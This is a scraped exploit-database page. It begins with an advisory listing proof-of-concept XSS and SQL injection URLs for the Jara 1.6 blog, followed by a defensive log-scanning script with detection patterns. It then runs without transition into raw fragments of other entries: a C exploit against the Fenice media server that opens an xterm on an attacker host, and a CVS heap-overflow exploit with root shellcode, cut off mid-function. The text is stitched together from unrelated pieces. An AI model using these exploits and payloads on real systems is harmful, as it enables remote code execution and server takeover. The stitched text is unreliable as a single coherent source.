Jara 1.6 Cross Site Scripting / SQL Injection Vulnerabilities
2012-10-21T00:00:00
ID 1337DAY-ID-19680 Type zdt Reporter Canberk BOLAT Modified 2012-10-21T00:00:00
Description
Jara version 1.6 suffers from cross site scripting and remote SQL injection vulnerabilities.
Information
--------------------
Name : XSS and SQL Injection Vulnerabilities in Jara
Software : Jara 1.6 and possibly below.
Vendor Homepage : http://sourceforge.net/projects/jara/
Vulnerability Type : Cross-Site Scripting and SQL Injection
Severity : Critical
Researcher : Canberk Bolat
Advisory Reference : NS-12-009
Description
--------------------
Jara is a simple open source blog built on PHP 5 and MySQL 5. It supports
multiple writers, categories, post management, static content pages and
post comments, and provides an intuitive administration panel.
Details
--------------------
Jara is affected by XSS and SQL Injection vulnerabilities in version 1.6.
Example PoC URLs are as follows:
SQL Injection Vulnerabilities
http://example.com/login.php (POST - username)
http://example.com/login.php (POST - password)
http://example.com/admin/delete_page.php?id='%2BNSFTW%2B'
http://example.com/admin/delete_post.php?id='%2BNSFTW%2B'
http://example.com/admin/delete_category.php?id='%2BNSFTW%2B'
http://example.com/admin/delete_user.php?id='%2BNSFTW%2B'
http://example.com/admin/edit_page.php?id='%2BNSFTW%2B'
http://example.com/admin/edit_user.php?id='%2BNSFTW%2B'
http://example.com/admin/edit_post.php (POST - id)
http://example.com/admin/edit_category.php (POST - id)
XSS Vulnerabilities
http://example.com/view.php?id='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0031F8)%3C/script%3E
http://example.com/page.php?id='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x003214)%3C/script%3E
http://example.com/category.php?id='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0032D5)%3C/script%3E
http://example.com/login.php (POST - username)
http://example.com/login.php (POST - password)
http://example.com/admin/delete_page.php?id='%3E%3Cscript%3Enetsparker(9)%3C/script%3E
http://example.com/admin/delete_category.php?id='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x003548)%3C/script%3E
http://example.com/admin/delete_post.php?id='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0034CE)%3C/script%3E
http://example.com/admin/delete_user.php?id='%3E%3Cscript%3Enetsparker(9)%3C/script%3E
http://example.com/admin/edit_post.php?id='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0034D5)%3C/script%3E
http://example.com/admin/edit_category.php?id='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x003542)%3C/script%3E
http://example.com/admin/edit_page.php?id='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x003569)%3C/script%3E
http://example.com/admin/edit_user.php?id='%3E%3Cscript%3Enetsparker(9)%3C/script%3E
Full articles on Cross-Site Scripting and SQL Injection vulnerabilities
are available here:
Cross-site Scripting: http://www.mavitunasecurity.com/crosssite-scripting-xss/
SQL Injection: http://www.mavitunasecurity.com/sql-injection/
Solution
--------------------
No patch released.
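Since no patch was released, one compensating control is to watch the web server access log for the GET endpoints listed above receiving a non-integer `id`. The following Python script is an added example (not part of the advisory or of the Jara project) that parses constructed Combined Log Format lines, checks the `id` parameter of each advisory endpoint and labels XSS-like, SQL-injection-like and other non-numeric values; it also decodes a second time so double-encoded probes are judged on their final form, which goes beyond the advisory's own payloads. The login.php POST fields are not covered, because POST bodies do not appear in access logs.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Jara 1.6 scripts from the advisory whose `id` query parameter should be a plain integer.
ID_ENDPOINTS = {
    "/view.php", "/page.php", "/category.php",
    "/admin/delete_page.php", "/admin/delete_post.php",
    "/admin/delete_category.php", "/admin/delete_user.php",
    "/admin/edit_page.php", "/admin/edit_user.php",
    "/admin/edit_post.php", "/admin/edit_category.php",
}

NUMERIC_ID = re.compile(r"^\d+$")
XSS_MARKERS = re.compile(r"<\s*/?\s*(script|style|img|svg|iframe)\b|javascript:|on\w+\s*=", re.I)
SQLI_MARKERS = re.compile(r"['\"]|--|/\*|\b(union|select|or|and)\b", re.I)

# Combined/common log format prefix: client ident user [time] "METHOD target HTTP/x" status
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})\b')


def parse_line(line):
    """Return the fields of one access-log line, or None if the line does not match."""
    m = LOG_LINE.match(line)
    if not m:
        return None
    client, timestamp, method, target, status = m.groups()
    return {"client": client, "time": timestamp, "method": method,
            "target": target, "status": int(status)}


def classify_id(value):
    """Label a decoded `id` value: None when it is a plain integer, else a reason string."""
    # parse_qs already decoded once; decode again so a double-encoded value
    # such as %2527 is judged as the quote character it becomes on the server.
    value = unquote(value)
    if NUMERIC_ID.match(value):
        return None
    if XSS_MARKERS.search(value):
        return "xss-pattern"
    if SQLI_MARKERS.search(value):
        return "sqli-pattern"
    return "non-numeric-id"


def classify_request(target):
    """Return (path, reason) when a request hits an advisory endpoint with a suspicious id, else None."""
    parts = urlsplit(target)
    if parts.path not in ID_ENDPOINTS:
        return None
    for raw in parse_qs(parts.query, keep_blank_values=True).get("id", []):
        reason = classify_id(raw)
        if reason:
            return parts.path, reason
    return None


def scan_log(lines):
    """Run the check over log lines; returns a list of (client, path, reason) hits."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["method"] not in ("GET", "HEAD"):
            continue
        result = classify_request(rec["target"])
        if result:
            path, reason = result
            hits.append((rec["client"], path, reason))
    return hits


# Constructed sample lines (not from any real server); the payload shapes follow the advisory.
SAMPLE_LOG = [
    '203.0.113.7 - - [21/Oct/2012:10:00:01 +0000] "GET /view.php?id=12 HTTP/1.1" 200 4211',
    '203.0.113.7 - - [21/Oct/2012:10:00:02 +0000] "GET /view.php?id=\'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0031F8)%3C/script%3E HTTP/1.1" 200 4300',
    '203.0.113.7 - - [21/Oct/2012:10:00:03 +0000] "GET /admin/delete_page.php?id=\'%2BNSFTW%2B\' HTTP/1.1" 200 512',
    '203.0.113.7 - - [21/Oct/2012:10:00:04 +0000] "GET /admin/edit_user.php?id=%2527 HTTP/1.1" 200 512',
    '198.51.100.4 - - [21/Oct/2012:10:00:05 +0000] "GET /index.php?id=\'%22 HTTP/1.1" 200 1024',
    '198.51.100.4 - - [21/Oct/2012:10:00:06 +0000] "GET /admin/edit_post.php?id=abc HTTP/1.1" 200 512',
    "garbage line that does not parse",
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print("%s %s %s" % hit)
```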
Advisory Timeline
--------------------
19/11/2011 - Could not find a contact e-mail
22/08/2012 - Vulnerability Released
Credits
--------------------
Discovered during testing of Netsparker, Web Application
Security Scanner - http://www.mavitunasecurity.com/netsparker/.
References
--------------------
MSL Advisory Link :
http://www.mavitunasecurity.com/xss-and-sql-injection-vulnerabilities-in-jara/
Netsparker Advisories : http://www.mavitunasecurity.com/netsparker-advisories/
# 0day.today [2018-03-06] #
ip]\\n\",argv[0]);\r\n\t\tprintf(\"**\\n** host: Fenice 1.10 Open Media Streaming Server\\n\");\r\n\t\tprintf(\"** port: default 554\\n\");\r\n\t\tprintf(\"** xhost ip: attacker xhost\\n**\\n\");\r\n\t\tprintf(\"** Example: %s fenice.omss.co.kr 554 82.82.82.82\\n**\\n*/\\n\",argv[0]);\r\n\t\texit(-1);\r\n\t}\r\n\telse {\r\n\t\tsscanf(argv[3],\"%d.%d.%d.%d\",&ip1,&ip2,&ip3,&ip4);\r\n#define IP1 16777216\r\n#define IP2 65536\r\n#define IP3 256\r\n\t\tip=0;\r\n\t\tip+=ip1 * (IP1);\r\n\t\tip+=ip2 * (IP2);\r\n\t\tip+=ip3 * (IP3);\r\n\t\tip+=ip4;\r\n\r\n\t\tmemset((char *)xhost_ip,0,256);\r\n\t\tsprintf(xhost_ip,\"%10lu\",ip);\r\n\t}\r\n\r\n\tmemset((char *)host,0,sizeof(host));\r\n\tstrncpy(host,argv[1],sizeof(host)-1);\r\n\tport=atoi(argv[2]);\r\n\r\n\tse=gethostbyname(host);\r\n\tif(se==NULL){\r\n\t\tprintf(\"** gethostbyname() error\\n**\\n*/\\n\");\r\n\t\treturn -1;\r\n\t}\r\n\tsock=socket(AF_INET,SOCK_STREAM,0);\r\n\tif(sock==-1){\r\n\t\tprintf(\"** socket() error\\n**\\n*/\\n\");\r\n\t\treturn -1;\r\n\t}\r\n\r\n\tsaddr.sin_family=AF_INET;\r\n\tsaddr.sin_port=htons(port);\r\n\tsaddr.sin_addr=*((struct in_addr *)se->h_addr);\r\n\tbzero(&(saddr.sin_zero),8);\r\n\r\n\r\n\tprintf(\"** make exploit\\n\");\r\n\tsprintf(do_ex,\"GET /\");\r\n\tj=strlen(do_ex);\r\n\tfor(i=0;i<320;i++,j++){\r\n\t\tsprintf(do_ex+j,\"A\");\r\n\t}\r\n\r\n#define __GOGOSSING(dest,index,src){\\\r\n\t*(long *)&dest[index]=src;\\\r\n\tindex+=4;\\\r\n}\r\n\r\n\t__GOGOSSING(do_ex,j,UNAME_PLT); /* uname GOT \u00c2\u00b0? 
A\u00c2\u00a4?o */\r\n\t// execle() AO?O A\u00c2\u00b6CO\r\n\t{\r\n\t\ti=0;\r\n\t\t/* (execle()>>0)&0xff */\r\n\t\t__GOGOSSING(do_ex,j,STRCPY_PLT);\r\n\t\t__GOGOSSING(do_ex,j,MOVE_ESP);\r\n\t\t__GOGOSSING(do_ex,j,GETGID_GOT+i++);\r\n\t\t__GOGOSSING(do_ex,j,EXECLE_00_0xff);\r\n\t\t/* (execle()>>8)&0xff */\r\n\t\t__GOGOSSING(do_ex,j,STRCPY_PLT);\r\n\t\t__GOGOSSING(do_ex,j,MOVE_ESP);\r\n\t\t__GOGOSSING(do_ex,j,GETGID_GOT+i++);\r\n\t\t__GOGOSSING(do_ex,j,EXECLE_08_0xff);\r\n\t\t/* (execle()>>16)&0xff */\r\n\t\t__GOGOSSING(do_ex,j,STRCPY_PLT);\r\n\t\t__GOGOSSING(do_ex,j,MOVE_ESP);\r\n\t\t__GOGOSSING(do_ex,j,GETGID_GOT+i++);\r\n\t\t__GOGOSSING(do_ex,j,EXECLE_16_0xff);\r\n\t}\r\n\t// argv[0],argv[1]: /usr/X11R6/bin/xterm\r\n\t{\r\n\t\ti=0;\r\n\t\t__GOGOSSING(do_ex,j,STRCPY_PLT);\r\n\t\t__GOGOSSING(do_ex,j,MOVE_ESP);\r\n\t\t__GOGOSSING(do_ex,j,DATA_LOC+i);\r\n\t\t__GOGOSSING(do_ex,j,SLASH_STR);\r\n\t\ti+=1; /* \"/\" */\r\n\t\t__GOGOSSING(do_ex,j,STRCPY_PLT);\r\n\t\t__GOGOSSING(do_ex,j,MOVE_ESP);\r\n\t\t__GOGOSSING(do_ex,j,DATA_LOC+i);\r\n\t\t__GOGOSSING(do_ex,j,XTERM_STR_1);\r\n\t\ti+=2; /* \"us\" */\r\n\t\t__GOGOSSING(do_ex,j,STRCPY_PLT);\r\n\t\t__GOGOSSING(do_ex,j,MOVE_ESP);\r\n\t\t__GOGOSSING(do_ex,j,DATA_LOC+i);\r\n\t\t__GOGOSSING(do_ex,j,XTERM_STR_2);\r\n\t\ti+=2; /* \"r/\" */\r\n\t\t__GOGOSSING(do_ex,j,STRCPY_PLT);\r\n\t\t__GOGOSSING(do_ex,j,MOVE_ESP);\r\n\t\t__GOGOSSING(do_ex,j,DATA_LOC+i);\r\n\t\t__GOGOSSING(do_ex,j,X_STR_1);\r\n\t\ti+=1; /* \"X\" */\r\n\t\t__GOGOSSING(do_ex,j,STRCPY_PLT);\r\n\t\t__GOGOSSING(do_ex,j,MOVE_ESP);\r\n\t\t__GOGOSSING(do_ex,j,DATA_LOC+i);\r\n\t\t__GOGOSSING(do_ex,j,NUM_1);\r\n\t\ti+=1; /* \"1\" */\r\n\t\t__GOGOSSING(do_ex,j,STRCPY_PLT);\r\n\t\t__GOGOSSING(do_ex,j,MOVE_ESP);\r\n\t\t__GOGOSSING(do_ex,j,DATA_LOC+i);\r\n\t\t__GOGOSSING(do_ex,j,NUM_1);\r\n\t\ti+=1; /* \"1\" */\r\n\t\t__GOGOSSING(do_ex,j,STRCPY_PLT);\r\n\t\t__GOGOSSING(do_ex,j,MOVE_ESP);\r\n\t\t__GOGOSSING(do_ex,j,DATA_LOC+i);\r\n\t\t__GOGOSSING(do_ex,j,R_STR);\r\n\t\ti+=1; /* 
\"R\" */\r\n\t\t__GOGOSSING(do_ex,j,STRCPY_PLT);\r\n\t\t__GOGOSSING(do_ex,j,MOVE_ESP);\r\n\t\t__GOGOSSING(do_ex,j,DATA_LOC+i);\r\n\t\t__GOGOSSING(do_ex,j,NUM_6);\r\n\t\ti+=1; /* \"6\" */\r\n\t\t__GOGOSSING(do_ex,j,STRCPY_PLT);\r\n\t\t__GOGOSSING(do_ex,j,MOVE_ESP);\r\n\t\t__GOGOSSING(do_ex,j,DATA_LOC+i);\r\n\t\t__GOGOSSING(do_ex,j,SLASH_STR);\r\n\t\ti+=1; /* \"/\" */\r\n\t\t__GOGOSSING(do_ex,j,STRCPY_PLT);\r\n\t\t__GOGOSSING(do_ex,j,MOVE_ESP);\r\n\t\t__GOGOSSING(do_ex,j,DATA_LOC+i);\r\n\t\t__GOGOSSING(do_ex,j,XTERM_STR_3);\r\n\t\ti+=3; /* \"bin\" */\r\n\t\t__GOGOSSING(do_ex,j,STRCPY_PLT);\r\n\t\t__GOGOSSING(do_ex,j,MOVE_ESP);\r\n\t\t__GOGOSSING(do_ex,j,DATA_LOC+i);\r\n\t\t__GOGOSSING(do_ex,j,SLASH_STR);\r\n\t\ti+=1; /* \"/\" */\r\n\t\t__GOGOSSING(do_ex,j,STRCPY_PLT);\r\n\t\t__GOGOSSING(do_ex,j,MOVE_ESP);\r\n\t\t__GOGOSSING(do_ex,j,DATA_LOC+i);\r\n\t\t__GOGOSSING(do_ex,j,X_STR_2);\r\n\t\ti+=1; /* \"x\" */\r\n\t\t__GOGOSSING(do_ex,j,STRCPY_PLT);\r\n\t\t__GOGOSSING(do_ex,j,MOVE_ESP);\r\n\t\t__GOGOSSING(do_ex,j,DATA_LOC+i);\r\n\t\t__GOGOSSING(do_ex,j,XTERM_STR_4);\r\n\t\ti+=4; /* \"term\" */\r\n\t\t__GOGOSSING(do_ex,j,STRCPY_PLT);\r\n\t\t__GOGOSSING(do_ex,j,MOVE_ESP);\r\n\t\t__GOGOSSING(do_ex,j,DATA_LOC+i);\r\n\t\t__GOGOSSING(do_ex,j,NULL_STR);\r\n\t\ti+=1; /* null */\r\n\t}\r\n\t// argv[2]: -display\r\n\t{\r\n\t\t__GOGOSSING(do_ex,j,STRCPY_PLT);\r\n\t\t__GOGOSSING(do_ex,j,MOVE_ESP);\r\n\t\t__GOGOSSING(do_ex,j,DATA_LOC+i);\r\n\t\t__GOGOSSING(do_ex,j,DISPLAY_OPTION);\r\n\t\ti+=3; /* \"-di\" */\r\n\t\t__GOGOSSING(do_ex,j,STRCPY_PLT);\r\n\t\t__GOGOSSING(do_ex,j,MOVE_ESP);\r\n\t\t__GOGOSSING(do_ex,j,DATA_LOC+i);\r\n\t\t__GOGOSSING(do_ex,j,NULL_STR);\r\n\t\ti+=1; /* null */\r\n\t}\r\n\t// argv[3]: xhost_ip:0\r\n\tfor(ip=0;ip<10;ip++){\r\n\t\t__GOGOSSING(do_ex,j,STRCPY_PLT);\r\n\t\t__GOGOSSING(do_ex,j,MOVE_ESP);\r\n\t\t__GOGOSSING(do_ex,j,DATA_LOC+i);\r\n\r\n\t\tswitch(xhost_ip[ip]){\r\n\t\t\tcase '0':\r\n\t\t\t\t__GOGOSSING(do_ex,j,NUM_0);\r\n\t\t\t\tbreak;\r\n\t\t\tcase 
'1':\r\n\t\t\t\t__GOGOSSING(do_ex,j,NUM_1);\r\n\t\t\t\tbreak;\r\n\t\t\tcase '2':\r\n\t\t\t\t__GOGOSSING(do_ex,j,NUM_2);\r\n\t\t\t\tbreak;\r\n\t\t\tcase '3':\r\n\t\t\t\t__GOGOSSING(do_ex,j,NUM_3);\r\n\t\t\t\tbreak;\r\n\t\t\tcase '4':\r\n\t\t\t\t__GOGOSSING(do_ex,j,NUM_4);\r\n\t\t\t\tbreak;\r\n\t\t\tcase '5':\r\n\t\t\t\t__GOGOSSING(do_ex,j,NUM_5);\r\n\t\t\t\tbreak;\r\n\t\t\tcase '6':\r\n\t\t\t\t__GOGOSSING(do_ex,j,NUM_6);\r\n\t\t\t\tbreak;\r\n\t\t\tcase '7':\r\n\t\t\t\t__GOGOSSING(do_ex,j,NUM_7);\r\n\t\t\t\tbreak;\r\n\t\t\tcase '8':\r\n\t\t\t\t__GOGOSSING(do_ex,j,NUM_8);\r\n\t\t\t\tbreak;\r\n\t\t\tcase '9':\r\n\t\t\t\t__GOGOSSING(do_ex,j,NUM_9);\r\n\t\t\t\tbreak;\r\n\t\t}\r\n\t\ti+=1;\r\n\t}\r\n\t{\r\n\t\t__GOGOSSING(do_ex,j,STRCPY_PLT);\r\n\t\t__GOGOSSING(do_ex,j,MOVE_ESP);\r\n\t\t__GOGOSSING(do_ex,j,DATA_LOC+i);\r\n\t\t__GOGOSSING(do_ex,j,COLON_STR);\r\n\t\ti+=1; /* \":\" */\r\n\t\t__GOGOSSING(do_ex,j,STRCPY_PLT);\r\n\t\t__GOGOSSING(do_ex,j,MOVE_ESP);\r\n\t\t__GOGOSSING(do_ex,j,DATA_LOC+i);\r\n\t\t__GOGOSSING(do_ex,j,NUM_0);\r\n\t\ti+=1; /* \"0\" */\r\n\t\t__GOGOSSING(do_ex,j,STRCPY_PLT);\r\n\t\t__GOGOSSING(do_ex,j,MOVE_ESP);\r\n\t\t__GOGOSSING(do_ex,j,DATA_LOC+i);\r\n\t\t__GOGOSSING(do_ex,j,NULL_STR);\r\n\t\ti+=1; /* null */\r\n\t}\r\n\t// exploit\r\n\t{\r\n\t\t__GOGOSSING(do_ex,j,GETGID_PLT); // getgidAC GOT?A execle() CO?o?\u00c2\u00a6 \u00c2\u00b0?Ao?C\u00c2\u00b7I, PLT\u00c2\u00b7I CU\u00c2\u00b5e?\u00c2\u00b5 \u00c2\u00b0??E.\r\n\t\t__GOGOSSING(do_ex,j,0x82828282); // callAI ???I?C\u00c2\u00b7I, AIAu CO?o %eip?\u00c2\u00a6 ?e?ACO?\u00c2\u00ad A\u00c2\u00a4?o.\r\n\t\t__GOGOSSING(do_ex,j,ARG1_LOC); /* argv[0] */\r\n\t\t__GOGOSSING(do_ex,j,ARG1_LOC); /* argv[1] */\r\n\t\t__GOGOSSING(do_ex,j,ARG2_LOC); /* argv[2] */\r\n\t\t__GOGOSSING(do_ex,j,ARG3_LOC); /* argv[3] */\r\n\t}\r\n\tprintf(\"** exploit size: %d\\n\",strlen(do_ex));\r\n\r\n\ti=connect(sock,(struct sockaddr *)&saddr,sizeof(struct sockaddr));\r\n\tif(i==-1){\r\n\t\tprintf(\"** connect() 
error\\n**\\n*/\\n\");\r\n\t\treturn -1;\r\n\t}\r\n\telse {\r\n\t\tprintf(\"** send exploit\\n\");\r\n\t\tsend(sock,do_ex,j,0);\r\n\r\n\t\tprintf(\"** sleepppppppp...\\n\");\r\n\t\tsleep(1);\r\n\t\tsend(sock,\"\\n\",1,0);\r\n\t\tsend(sock,\"\\n\",1,0);\r\n\t}\r\n\tclose(sock);\r\n\r\n\tprintf(\"** xhost, check it up, now!\\n**\\n*/\\n\");\r\n\texit(0);\r\n}\r\n\r\n/* eoc */\r\n\r\n\r\n\n# 0day.today [2018-04-03] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/8911"}, {"lastseen": "2018-01-05T03:15:42", "bulletinFamily": "exploit", "description": "Exploit for solaris platform in category remote exploits", "modified": "2004-06-25T00:00:00", "published": "2004-06-25T00:00:00", "id": "1337DAY-ID-8399", "href": "https://0day.today/exploit/description/8399", "type": "zdt", "title": "CVS Remote Entry Line Root Heap Overflow Exploit", "sourceData": "================================================\r\nCVS Remote Entry Line Root Heap Overflow Exploit\r\n================================================\r\n\r\n#include <stdio.h>\r\n#include <string.h>\r\n#include <unistd.h>\r\n#include <stdlib.h>\r\n#include <sys/types.h>\r\n#include <signal.h>\r\n#include <sys/socket.h>\r\n#include <netinet/in.h>\r\n#include <stdarg.h>\r\n#include <netdb.h>\r\n#include <errno.h>\r\n#include <sys/time.h>\r\n#include <fcntl.h>\r\n#include <zlib.h>\r\n\r\n#define CVS_PORT 2401\r\n#define RET 0xffbffd20\r\n#define NOP 0x82102017\r\n#define ROUND(s) if (s % word_size) s += (word_size - (s % word_size))\r\n\r\nunsigned char *root;\r\nunsigned char *user;\r\nunsigned char *pass;\r\nunsigned char *scrambled;\r\nunsigned char *reposit;\r\nunsigned char *directory;\r\nunsigned char buf[512];\r\nunsigned char *host;\r\nunsigned int rport, port;\r\nunsigned int target;\r\nz_stream zout;\r\nz_stream zin;\r\nunsigned char zbuf[65536 * 4];\r\nunsigned int zbufpos, zsent = 0;\r\nunsigned int word_size = 8, fill_size;\r\nunsigned int len1, len2, len3;\r\nunsigned int 
oflip, change, retaddr;\r\n\r\nchar entry1[64], entry2[64], entry3[64];\r\n\r\nstruct expl {\r\n char *name;\r\n unsigned int retadd;\r\n} serve[] = { \r\n{ \"cvs-1.11.1p1 - Solaris9 / SPARC\", 0xd4cc8},\r\n{ \"cvs-1.12.2 - Solaris9 / SPARC\", 0xd7ae8 + 8192},\r\n{ \"cvs-1.9.28 - Solaris 9 / SPARC\", 0xd25b8},\r\n{ \"Crash server\", 0x41414141}, \r\n{ \"Crash server 2\", 0x77777777}, \r\n{ \"Stack ret test\", 0xffbffd20},\r\n{ \"Heap ret test\", 0x00031337}, \r\n{ NULL, 0}\r\n};\r\n\r\nchar shellcode[]=\r\n \"\\x21\\x18\\xd8\\x58\" // sethi %hi(0x63616000), %l0\r\n \"\\xa0\\x14\\x23\\x61\" // or %l0, 0x361, %l0\r\n \"\\x90\\x10\\x20\\x01\" // mov 1, %o0\r\n \"\\x92\\x0b\\x80\\x0e\" // and %sp, %sp, %o1\r\n \"\\x94\\x10\\x20\\x04\" // mov 4, %o2\r\n \"\\x82\\x10\\x20\\x04\" // mov 4, %g1\r\n \"\\x91\\xd0\\x20\\x08\" // ta 8\r\n/* lsd shellcode. */ \r\n \"\\x20\\xbf\\xff\\xff\" /* bn,a <shellcode-4> */\r\n \"\\x20\\xbf\\xff\\xff\" /* bn,a <shellcode> */\r\n \"\\x7f\\xff\\xff\\xff\" /* call <shellcode+4> */\r\n \"\\x90\\x03\\xe0\\x20\" /* add %o7,32,%o0 */\r\n \"\\x92\\x02\\x20\\x10\" /* add %o0,16,%o1 */\r\n \"\\xc0\\x22\\x20\\x08\" /* st %g0,[%o0+8] */\r\n \"\\xd0\\x22\\x20\\x10\" /* st %o0,[%o0+16] */\r\n \"\\xc0\\x22\\x20\\x14\" /* st %g0,[%o0+20] */\r\n \"\\x82\\x10\\x20\\x0b\" /* mov 0xb,%g1 */\r\n \"\\x91\\xd0\\x20\\x08\" /* ta 8 */\r\n \"/bin/ksh\";\r\n\r\nchar *scramble(char * str);\r\n\r\nvoid handler(int sig)\r\n{\r\n signal(SIGPIPE, handler);\r\n}\r\n\r\n/* \r\n * This function reads from socket s until either max bytes are read, \r\n * a newline is read, or timeout seconds elapse with no data over the \r\n * socket.\r\n * return values:\r\n * -2: timeout\r\n * -1: error\r\n * 0: connection closed\r\n * x: normal success, x bytes read\r\n */\r\nint timeout_read(int s, char *buf, int max, int timeout)\r\n{\r\n int total = 0;\r\n int r = 0;\r\n int s_flags;\r\n char c;\r\n struct timeval to;\r\n fd_set rset;\r\n \r\n memset(&to, '\\0', sizeof(to));\r\n 
to.tv_sec = timeout;\r\n to.tv_usec = 0;\r\n \r\n s_flags = fcntl(s, F_GETFL, 0);\r\n fcntl(s, F_SETFL, s_flags | O_NONBLOCK);\r\n\r\n while(total < max)\r\n {\r\nFD_ZERO(&rset);\r\nFD_SET(s, &rset);\r\nselect(s + 1, &rset, NULL, NULL, &to);\r\n\r\nif (FD_ISSET(s, &rset))\r\n{\r\n r = read(s, &c, 1);\r\n total += r;\r\n\r\n if(r == -1)\r\n {\r\nif (errno != EWOULDBLOCK)\r\n{\r\n fcntl(s, F_SETFL, s_flags);\r\n return -1;\r\n}\r\nelse\r\n continue;\r\n }\r\n else if(r == 0)\r\n {\r\nfcntl(s, F_SETFL, s_flags);\r\nreturn 0;\r\n }\r\n else /* r == 1 */\r\n {\r\nbuf[total-1] = c;\r\nif(c == '\\n')\r\n break;\r\n }\r\n \r\n}\r\nelse\r\n{\r\n fcntl(s, F_SETFL, s_flags);\r\n return -2;\r\n}\r\n }\r\n \r\n fcntl(s, F_SETFL, s_flags);\r\n return total; \r\n}\r\n\r\nvoid zflush(int sockfd)\r\n{\r\n static char outbuf[65536];\r\n\r\n zout.next_in = zbuf;\r\n zout.avail_in = zbufpos;\r\n\r\n do {\r\n zout.next_out = outbuf;\r\n zout.avail_out = sizeof(outbuf);\r\n if(deflate(&zout, Z_PARTIAL_FLUSH) == -1)\r\n {\r\nprintf(\"[--] Compression error.\\n\");\r\nexit(1);\r\n}\r\n zsent += sizeof(outbuf) - zout.avail_out;\r\n write(sockfd, outbuf, sizeof(outbuf) - zout.avail_out);\r\n } while (zout.avail_in != 0);\r\n\r\n zbufpos = 0;\r\n\r\n return;\r\n}\r\n\r\nint zwrite(char *buf, int len, int sockfd)\r\n{\r\n if ((sizeof(zbuf) - zbufpos) < (len))\r\n zflush(sockfd);\r\n\r\n memcpy(zbuf + zbufpos, buf, len);\r\n zbufpos += len;\r\n\r\n if (zbufpos >= sizeof(zbuf))\r\n {\r\nprintf(\"[--] zwrite compression error.\\n\");\r\nexit(1);\r\n }\r\n\r\n return (len);\r\n}\r\n\r\nint zgetch(int sockfd)\r\n{\r\n static char * outbuf = NULL;\r\n static int outpos = 0, outlen = 0;\r\n static char rcvbuf[32768];\r\n static char dbuf[4096];\r\n int got;\r\n\r\n retry:\r\n if (outpos < outlen && outlen)\r\n return outbuf[outpos++];\r\n free(outbuf);\r\n outlen = 0;\r\n outbuf = NULL;\r\n got = read(sockfd, rcvbuf, sizeof(rcvbuf));\r\n if (got <= 0)\r\n {\r\nprintf(\"[--] Socket 
error.\\n\");\r\nexit(1);\r\n }\r\n zin.next_in = rcvbuf;\r\n zin.avail_in = got;\r\n while (1)\r\n {\r\n int status, dlen;\r\n\r\n zin.next_out = dbuf;\r\n zin.avail_out = sizeof(dbuf);\r\n status = inflate(&zin, Z_PARTIAL_FLUSH);\r\n switch (status)\r\n {\r\n case Z_OK:\r\n outpos = 0;\r\n dlen = sizeof(dbuf) - zin.avail_out;\r\n outlen += dlen;\r\n outbuf = realloc(outbuf, outlen);\r\n memcpy(outbuf + outlen - dlen, dbuf, dlen);\r\n break;\r\n case Z_BUF_ERROR:\r\n goto retry;\r\n default:\r\n printf(\"[--] Revc inflate error.\\n\");\r\n }\r\n }\r\n}\r\n\r\nchar *zgets(int sockfd)\r\n{\r\n static char buf[32768];\r\n char * p = buf;\r\n int c;\r\n\r\n while (1)\r\n {\r\n c = zgetch(sockfd);\r\n if (c == '\\n')\r\n break;\r\n *p++ = c;\r\n if (p > buf + sizeof(buf))\r\n {\r\n p--;\r\n break;\r\n }\r\n }\r\n *p = 0;\r\n return (buf);\r\n}\r\n\r\nint do_compression(int s)\r\n{\r\nchar buf[3000];\r\nint term = 0, i = 0;\r\n\r\ndeflateInit(&zout, 1);\r\n inflateInit(&zin);\r\n\r\nmemset(buf, 0x0, 300);\r\nsprintf(buf, \"Gzip-stream 1\\n\");\r\n\r\nwrite(s, buf, strlen(buf));\r\n}\r\n\r\nint do_auth(int s)\r\n{\r\nchar* str = malloc(50000);\r\n if(str == 0)\r\n {\r\n perror(\"malloc\");\r\n exit(1);\r\n }\r\nstrcpy(str, \"BEGIN AUTH REQUEST\");\r\nstrncat(str, \"\\n\", 1);\r\nstrncat(str, reposit, strlen(reposit));\r\nstrncat(str, \"\\n\", 1);\r\nstrncat(str, user, strlen(user));\r\nstrncat(str, \"\\n\", 1);\r\nscrambled = scramble(pass);\r\nstrncat(str, scrambled, strlen(scrambled));\r\nstrncat(str, \"\\n\", 1);\r\nstrncat(str, \"END AUTH REQUEST\", 16);\r\nstrncat(str, \"\\n\", 1);\r\nwrite(s, str, strlen(str)); \r\nfree(str);\r\n\r\nreturn 0;\r\n}\r\n\r\nint do_root(int s)\r\n{\r\nchar* str = malloc(5000);\r\n\r\n bzero(str, 5000);\r\nstrncat(str, \"Root \", 5);\r\nstrncat(str, root, strlen(root));\r\nstrncat(str, \"\\n\", 1);\r\nwrite(s, str, strlen(str));\r\nfree(str);\r\n\r\nreturn 0;\r\n}\r\n\r\nint do_sized_entry(int s, char *e1, char *e2, int 
